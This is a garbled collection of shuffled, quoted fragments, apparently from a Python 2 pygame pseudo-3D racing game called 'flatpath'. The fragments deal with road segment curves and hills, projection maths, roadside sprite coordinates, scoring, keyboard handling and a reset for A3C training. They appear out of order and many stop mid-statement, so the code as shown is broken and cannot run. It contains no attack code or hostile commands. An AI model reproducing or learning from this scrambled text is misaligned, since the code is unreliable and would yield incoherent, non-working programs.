"760, 'w': 168, 'h': 248 }, 'BUSH1': { 'x': 5,", "#print '-' * 60 pass def rd_sprts_render(self, seg, x_pos, x_i,", "pnts def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs, rad) #print", "- curve_d * i #xc4 = -self.road_w / 2 -", "= {} for k, v in seg.items(): if k not", "random.choice(x_pos) x_i = random.randint(0, len(x_pos) - 1) # NOTE: not", "self.player_di = 3 #''' #''' self.position += 10.0#5.0#1.0 self.position +=", "0: trees.rect.left += trees.rect.width * 2 if trees.rect.left - trees.rect.width", "rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file)", "ys2, self.w, ys4, 0, ys3, seg['color']['grass']) # road self.render_polygon(None, xs1,", "40 #p_dt = -40 #p_dt = random.randint(-100, 100) #print p_dt", "FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent =", "self.track_len # for check score self.last_seg_i = 0 self.game_over =", "zc def xc_to_xp(self, xc, d, zc): if zc == 0.0:", "we check score once for a segment seg_i = self.player_seg['index']", "tht_d def get_segs_pnts(self, segs, rad): pnts = [] x, y", "def util_accelerate(self, v, accel, dt): return v + (accel *", "= utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args, **kwargs): #return", "winh, *args, **kwargs): super(GMFlatpath, self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg',", "random.randint(2, 6) # for a3c train self.rd_seg_init_rand(segnrand) # for segment", "<3> #engi = math.pi / 2.0 / self.seg_draw_n engi =", "= random.choice(x_pos) x_i = random.randint(0, len(x_pos) - 1) # NOTE:", "295 }, 'BILLBOARD04': { 'x': 1205, 'y': 310, 'w': 268,", "dx_curve = - (b_curve * b_percent) x_curve = 0 #", "if self.position > self.track_len: self.position -= self.track_len # for check", "/ 2 - 10) * seg_scale #x_sprt = (xs1 +", "# for test if i < 10: print xs1, ys1,", "dpx1 # <1> #for i, seg in enumerate(self.segments): # <2>", "\"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi", "a + (b - a) * math.pow(percent, 2) def util_ease_out(self,", "2.0 - h / 2.0 * yp ys = h", "= c self.h = h self.draw_on() def draw_on(self, *args, **kwargs):", "#self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self,", "+= trees.rect.width * 2 if trees.rect.left - trees.rect.width > 0:", "sky sky.rect.left += int(self.sky_speed * p_dt) # always move the", "0.0 #elif p < 0.8: # curve = 0.0 #", "#print 'self.position', self.position for i, seg in enumerate(self.segments): zw1 =", "2, self.size[1] / 2), self.size[0] / 2, 0) class SptTmpi(pygm.SptImg):", "#pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d],", "'y': 897, 'w': 298, 'h': 140 }, 'TREE2': { 'x':", "{'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health':", "\"\"\"curve test 2: draw a circle\"\"\" #theta_i = math.pi /180.0", "# the segment just under the car self.player_di = 0", "i < self.seg_draw_n / 2: if i < self.seg_draw_n /", "in e_keys_up: if self.player_di != 3: self.player_di = 0 if", "'x': 1205, 'y': 490, 'w': 150, 'h': 260 }, 'BOULDER1':", "40 w_half = car_w / 2 + sprt_w / 2", "range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve,", "True self.game_score = -1.0 def check_score(self): # make sure we", "zc == 0.0: return 1.0 else: return d / zc", "c = FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg = {", "= [] self.rd_sprt_objs = {} self.rd_sprt_cache = [] # for", "super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs):", "self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w)", "'y': 5, 'w': 215, 'h': 540 }, 'BILLBOARD08': { 'x':", "n=3): seg_n = len(self.segments) if seg_n == 0: return #self.segments[0]['color']", "r_events = [] e_keys_up = [] e_keys_dn = [] for", "# for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 - int(ys1)),", "right order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx,", "#self.player_x -= self.player_x_dt self.player_x -= self.speed / 5 + 20", "/ 2 - self.player_x #xc3 = self.road_w / 2 -", "xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4,", "'h': 260 }, 'BOULDER1': { 'x': 1205, 'y': 760, 'w':", "leave, curve, yw) def rd_start_seg_init(self, n=3): seg_n = len(self.segments) if", "seg.get('sprites') if not sprts: return None for i, info in", "#print 'car_w', car_w #print 'sprt_at', (car_x - car_w / 2),", "#self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand", "k == self.pglc.K_SPACE or k == self.pglc.K_v or k ==", "#self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def", "self.pglc.K_j: return 0 elif k == self.pglc.K_k: return 1 elif", "0.0 pnts.append([x, y]) for seg in segs: curve = seg.get('curve',", "not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) '''", "* 80 print 'self.position', self.position # <2> seg_n = len(self.segments)", "draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top", "FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT':", "-self.road_w / 2 - self.player_x - curve_d * i xp1", "if not scr: # None or 0 return obj =", "p_dt) if trees.rect.left + trees.rect.width < 0: trees.rect.left += trees.rect.width", "for test #o = SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase):", "return 1.0 else: return d / zc def xc_to_xp(self, xc,", "% self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z']", "xs4 += dx2 #+ dx1 ''' self.render_polygon(None, 0, ys1, self.w,", "i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def", "self.player_x car_w = self.car.rect.width * 2 sprt_at = 10000 if", "= self.rd_seg_json_load(segs_file) self.segments = segs self.track_len = len(self.segments) * self.seg_len", "<1>', scale pass else: try: obj.scale(scale) except: #print 'scale <2>',", "__file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top = -230", "cv_s = 0 cv_l = 0.0 pnts.append([x, y]) for seg", "#self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left", "spr_n = {} for sk, sv in spr.items(): if sk", "TODO: check if this seg is looped seg_scale = self.geo_prjc_scale(self.d,", "or k == self.pglc.K_j: return 0 elif k == self.pglc.K_k:", "= zw2 - self.camera_z - self.position ''' # for curve", "else: self.tm_start = 0.0 #self.tm_end = 0.0 def update_bg(self): #", "k == self.pglc.K_RIGHT: return 1 elif k == self.pglc.K_DOWN: return", "self.pglc.K_TAB: self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k ==", "- self.position ''' # for curve xc1 = xc1 -", "if 2 in e_keys_up: if self.player_go != 1: self.player_go =", "self.pglc.K_d: return 3 else: return None def check_key(self, events): #print", "#sf = GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath <:::>',", "self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img) # for test", "- x_curve - dx_curve x_curve = x_curve + dx_curve dx_curve", "self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value,", "'segbi', segbi # TODO: do at update #dpx1 = self.seg_len", "== self.pglc.K_TAB: self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k", "road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset()", "= int(utils.math_round(pos / self.seg_len)) #i = int(math.floor(pos / self.seg_len)) #i", "5, 'y': 1262, 'w': 230, 'h': 220 }, 'BILLBOARD02': {", "self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0 self.yw =", "x_curve + dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) #", "__init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg = c_bg self.c_prog", "zc2 = zw2 - self.camera_z - (self.position % self.seg_len) '''", "-50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score':", "def __init__(self, title, winw, winh, *args, **kwargs): super(GMFlatpath, self).__init__(title, winw,", "k): if k == self.pglc.K_UP: return 0 elif k ==", "yp, h): #ys = h / 2.0 - h /", "i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n", "mx while (result < 0): result += mx return result", "zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 =", "+= hill.rect.width * 2 if hill.rect.left - hill.rect.width > 0:", "segs: curve = seg.get('curve', 0.0) if curve == 0.0: if", "math.pi /180.0 * 0.9 #theta_i = 0.0 xc1 = self.road_w", "y, self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite): def __init__(self, cfg,", "#print 'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) #", "'x': 5, 'y': 1262, 'w': 230, 'h': 220 }, 'BILLBOARD02':", "sprt = sprts[0] x_i = sprt.get('x_i') if x_i is None:", "}, 'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215, 'h':", "self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d,", "float(n)/total)) for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for", "sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed if sky.rect.left + sky.rect.width", "== 0: c = FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE} else:", "''' # for test if i < 10: print xs1,", "= self.speed * p_curve * self.centrifugal #print p_dt #self.player_x -=", "1: sprt_at = -40 elif x_i == 2: sprt_at =", "self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h", "rct = [0, i * d, self.size[0], d] #ca =", "'-' * 30 ''' ''' #x# if seg['index'] < segbi:", "#print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left = (640", "= 0.0 pnts.append([x, y]) for seg in segs: curve =", "seg_n return i def rd_get_segs(self, whole=False): if whole: segs =", "= 400 self.car.rect.left = (640 - self.car.rect.width) / 2 ##self.disp_add(self.car)", "random.randint(0, len(x_pos) - 1) # NOTE: not used now !!", "else: yp = yc * (d / zc) return yp", "0.5 theta_i = math.pi /180.0 * 0.9 #theta_i = 0.0", "is looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w", "dx_curve = dx_curve + seg.get('curve', 0.0) # for hills yw1", "'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW,", "height): num = num or ROAD['LENGTH']['SHORT'] height = height or", "== 5: sprt_at = -1100 #print 'sprt_x', sprt_x #print 'car_x',", "self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n", "* 0.9 #theta_i = 0.0 #xc1 = self.road_w / 2", "+= self.speed / 5 + 20 elif self.player_di == 3:", "xs3, ys3 print '-' * 30 ''' # grass self.render_polygon(None,", "#self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left = (640 - self.car.rect.width)", "}, # num segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM':", "= 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])", "if scale > 500: #print 'scale <1>', scale pass else:", "self.add_road(enter, hold, leave, curve, yw) def rd_seg_init_rand_2(self, n=50): for i", "self.player_go = 0 if 1 in e_keys_up: if self.player_di !=", "None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f): sc =", "road * RETURN : go to a new road TODO:", "kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])", "self.rd_seg_render() def refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render()", "sprt_x #print 'car_x', car_x #print 'car_w', car_w #print 'sprt_at', (car_x", "in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1, y1, x2, y2,", "0) class SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file)", "= kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road =", "897, 'w': 298, 'h': 140 }, 'TREE2': { 'x': 1205,", "http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE : hide/show", "2: self.speed -= 10 if self.speed < 0.0: self.speed =", "/ 2: if self.score > 0: self.score -= 1 #self.score", "self.camera_z - self.position ''' # for curve xc1 = xc1", "'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168, 'h': 248", "curve = seg.get('curve', 0.0) if curve == 0.0: if cv_s:", "hill.rect.left += hill.rect.width * 2 if hill.rect.left - hill.rect.width >", "self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0]", "= (rad - xx3) - self.player_x xc4 = (rad -", "Usage: * UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map *", "{ 'name': sprt, 'type': 1, # image / animate /", "random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s = {", "116 - y + 240 - obj.rect.height obj.rect.left = x_pos[x_i_saved]", "self).__init__() self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top =", "+ xsl1) / 2.0, (xsr2 + xsl2) / 2.0, xsl1,", "< self.player_x -= 9 if self.player_x < -1000: self.player_di =", "- self.player_x xc2 = (rad - xx2) - self.player_x xc3", "'x': 5, 'y': 985, 'w': 1280, 'h': 480 }, }", "return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i in", "dx_curve xc4 = xc4 - x_curve - dx_curve xcl1 =", "y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]] #pnts", "self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0]", "< 0): result += mx return result def util_ease_in(self, a,", "2 if self.speed <= 0.0: return p_curve = self.player_seg.get('curve', 0.0)", "i in range(self.seg_draw_n): #''' # <2> si = (segbi +", "- self.player_x # <3> #engi = math.pi / 2.0 /", "- self.camera_z - self.position # for curve xc1 = xc1", "obj self.disp_add(obj) ''' # <2> if obj: self.disp_del(obj) # NOTE:", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2", "*args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size,", "- y + 240 - obj.rect.height obj.rect.left = x_pos[x_i_saved] -", "for trees in self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt) if", "= 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for seg in", "== self.pglc.K_k: return 1 elif k == self.pglc.K_SPACE or k", "at render ##'x_i': None, # get real (random) x from", "57 }, 'CAR01': { 'x': 1205, 'y': 1018, 'w': 80,", "'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_STRAIGHT': { 'x':", "{ 'x': 995, 'y': 330, 'w': 195, 'h': 140 },", "start_y + (int(yw) * self.seg_len) total = enter + hold", "= self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts: return #", "self.road = FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2],", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1)", "self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2,", "-1.0: a = -1.0 elif a > 1.0: a =", "= 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos is None:", "= [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1,", "def __init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({})", "self.base_seg = self.segments[(segbi + 2) % seg_n] # for test", "/ 2 #if (car_x + car_w / 2) < sprt_x", "# NOTE: here we should use the segment just under", "self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render", "* (n - i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct)", "'h': 332 }, 'BILLBOARD09': { 'x': 150, 'y': 555, 'w':", "self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len)) #i = int(math.floor(pos /", "= self.segments segs_c = [] for seg in segs: if", "clear the sprites cache self.rd_sprt_cache = [] # <1> #for", "self.player_di != 1: self.player_di = 0 def update_world(self): if self.player_go", "} } FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW =", "xx3 = rad1 * math.cos(engi * (i + 1)) xx4", "*args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len", "0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top", "size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg = c_bg self.c_prog =", "* (i + 1) dx1 = self.seg_len * math.tan(theta1) dx2", "80 #print 'self.position', self.position for i, seg in enumerate(self.segments): zw1", "handle_event(self, events, *args, **kwargs): return events def refresh(self, fps_clock, *args,", "enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "enter + hold + leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0,", "in e_keys_up: if self.player_go != 1: self.player_go = 0 if", "self.segments = segs self.track_len = len(self.segments) * self.seg_len except Exception", "116 - int(ys1)), # 3, 0) # render road sprites", "seg_n == 0: return 0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y',", "* 0.9 #theta_i = 0.0 xc1 = self.road_w / 2", "__init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne):", "(n - i) ca = 200 / n * (n", "#+ dx1 xs4 += dx2 #+ dx1 #''' self.render_polygon(None, 0,", "= 40 elif x_i == 1: sprt_at = -40 elif", "self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg = None #", "seg['color']['grass']) # road self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4,", "break return obj def handle_event(self, events, *args, **kwargs): #print '>>>", "#xs = w / 2.0 + w / 2.0 *", "== self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event)", "= v else: seg_c[k] = [] for spr in seg['sprites']:", "0 # 0:^ 1:> 2:v 3:< self.player_go = 0 #", "'h': 282 }, 'BOULDER3': { 'x': 230, 'y': 280, 'w':", "# 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0", "self.lane_w] sprt_x = obj.rect.left sprt_w = obj.rect.width car_x = self.player_x", "'TREE1': { 'x': 625, 'y': 5, 'w': 360, 'h': 360", "= random.randint(10, 40) leave = random.randint(10, 40) if p <", "= cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills =", "-= 9 if self.player_x < -1000: self.player_di = 1 elif", "e_keys_up.append(di) else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key)", "'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w':", "random.random() #print p rl = random.choice([1, -1]) enter = random.randint(10,", "self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top", "'TREE2': { 'x': 1205, 'y': 5, 'w': 282, 'h': 295", "fo.write(s) def rd_seg_json_load(self, f): with open(f, 'r') as fi: s", "= 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n =", "self.segments segs_c = [] for seg in segs: if not", "{ 'x': 1383, 'y': 825, 'w': 80, 'h': 59 },", "0.0 ## self.xp = 0.0 self.yp = 0.0 self.xs =", "self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False, keep_segs=False,", "on the grass, slow down if self.player_x < -self.road_w /", "= random.randint(10, 100) self.add_road(enter, hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self,", "sprt.get('x_i') if x_i is None: return scr = sprt.get('score') if", "reset to delete all # NOTE: only show one break", "1: #if i < self.seg_draw_n / 2: if i <", "< (car_x + w_half): self.score += scr def check_tm(self): if", "in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n", "obj = info.get('obj') ''' # TODO: <1> if not obj:", "xcr1 = xcr1 - x_curve xcr2 = xcr2 - x_curve", "* (i + 1)) xx4 = rad2 * math.cos(engi *", "= self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc2, self.d,", "self.last_seg_i = seg_i else: return # NOTE: here we should", "= e_keys_up self.e_keys_dn = e_keys_dn return r_events def refresh__1(self, fps_clock,", "2 - self.player_x #xc3 = self.road_w / 2 - self.player_x", "255 / n * (n - i) ca = 200", "168, 'h': 248 }, 'BUSH1': { 'x': 5, 'y': 1097,", "self.segments[:-self.seg_draw_n] return segs # #### geometry #### # def geo_prjc_scale(self,", "self.prms_reset(keep_segs=keep_segs) if segs_file is not None: try: segs = self.rd_seg_json_load(segs_file)", "pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self,", "/ 2.0 + xp return xs def yp_to_ys(self, yp, h):", "return xs def yp_to_ys(self, yp, h): #ys = h /", "None, # need to create at render ##'x_i': None, #", "self.player_x xc4 = -self.road_w / 2 - self.player_x yc =", "self.lane_w - self.player_x xcr4 = -self.lane_w - self.player_x yc =", "self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left = 0 self.disp_add(self.road)", "}, 'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328, 'h':", "'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE},", "events def refresh(self, fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def", "rad_m * math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x, y])", "'TREES': { 'x': 5, 'y': 985, 'w': 1280, 'h': 480", "== self.pglc.K_f or k == self.pglc.K_j: return 0 elif k", "y3, x4, y4, color): #d = 200#100#240#50# #a = 60", "zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if", "return segs # #### geometry #### # def geo_prjc_scale(self, d,", "}, 'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298, 'h':", "#''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up)", "self.player_go == 1: self.speed += self.speed_dt_up elif self.player_go == 2:", "= self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d,", "#pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a],", "ys4 = ys3 #''' #if 1: #if i < self.seg_draw_n", "'TRUCK': { 'x': 1365, 'y': 644, 'w': 100, 'h': 78", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2)", "ROAD['HILL']['LOW'] self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num, 0,", "self.player_go == 2: self.speed -= self.speed_dt_dn else: self.speed -= self.speed_dt_na", "{ 'x': 1295, 'y': 1018, 'w': 80, 'h': 45 },", "return ys def rd_seg_init(self, a=500): for n in range(a): self.rd_seg_add(0.0,", "+= self.player_x_dt self.player_x += self.speed / 5 + 20 elif", "self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "self.player_x yc = self.camera_h #print '=' * 80 #print 'self.position',", "!! ##x_i = 2 y_sprt = ys1 scale_sprt = seg_scale", "yp def xp_to_xs(self, xp, w): #xs = w / 2.0", "55 }, 'CAR02': { 'x': 1383, 'y': 825, 'w': 80,", "self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left = 100", "= self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 =", "info['obj'] = obj self.disp_add(obj) ''' # <2> if obj: self.disp_del(obj)", "##'x_i': None, # get real (random) x from x_pos 'x_i':", "= 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top =", "135, 'h': 332 }, 'BILLBOARD09': { 'x': 150, 'y': 555,", "0.0 # yw = random.random() * 10.0 else: curve =", "winw, winh, *args, **kwargs): super(GMFlatpath, self).__init__(title, winw, winh) bk_im =", "random.randint(10, 100) self.add_road(enter, hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5):", "= self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4,", "#x_sprt = random.choice(x_pos) x_i = random.randint(0, len(x_pos) - 1) #", "'w': 298, 'h': 190 }, 'BILLBOARD05': { 'x': 5, 'y':", "self.scr.rect.top = 40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)),", "#''' #''' self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10) if", "ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):", "= self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i = seg_i else:", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2)", "2 - self.player_x - curve_d * i #xc2 = -self.road_w", "return # NOTE: we now only use the first sprite", "* 2 if self.speed <= 0.0: return p_curve = self.player_seg.get('curve',", "segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt' segs_file = utils.dir_abs(segs_file,", "0.0: #xp = float('inf') #xp = 2 ** 64 xp", "self.player_go != 1: self.player_go = 0 if 1 in e_keys_up:", "self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15# def", "if self.player_x > 1000: self.player_di = 3 #''' #''' self.position", "{'world': {'z': (n + 2) * self.seg_len, 'y': yw}, 'camera':", "= self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4 =", "0 self.score = 0 self.game_over = False self.game_score = 0.0", "num, num, 0, -height) self.add_road(num, num, num, 0, height) self.add_road(num,", "'CAR04': { 'x': 1383, 'y': 894, 'w': 80, 'h': 57", "= self.lane_w - self.player_x xcr2 = 